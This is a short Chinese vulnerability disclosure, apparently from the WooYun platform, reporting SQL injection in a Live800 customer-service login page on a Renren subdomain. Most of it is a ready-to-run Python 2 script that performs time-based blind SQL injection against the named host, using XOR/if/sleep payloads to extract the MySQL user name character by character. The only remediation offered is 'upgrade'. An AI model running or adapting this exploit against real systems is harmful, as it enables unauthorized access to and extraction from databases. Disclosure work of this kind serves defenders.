人人网某站sql注入漏洞

最近live800好像很火 就乌云搜索了一下.....https://live800.wan.renren.com/live800/loginAction.jsp?companyLoginName=1*&loginName=a111&password=111 live800客服系统 这个被那位大牛爆了很多洞找了个lijiejie脚本 刚开始一直不行 爆incomplete format什么异常、、、 折腾了一会、、弄完脚本瞬间感觉高富帅了 哈哈 求首页啊


import httplib
import time
import string
import sys
import random
import urllib
headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
    for payload in payloads:
        try:
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = "1'XOR(if(%s,sleep(3),0))OR'1" % s
            conn = httplib.HTTPConnection('live800.wan.renren.com', timeout=3)
            conn.request(method='GET',url="/live800/loginAction.jsp?companyLoginName=1%s&loginName=a111&password=111" % urllib.quote(s))
            conn.getresponse()
            conn.close()
            print '.',
        except Exception,e:
            print e
            user += payload
            print '\n[in progress]', user,
            time.sleep(3.0)
            break
print '\n[Done] MySQL user is %s' % user
解决方案:
升级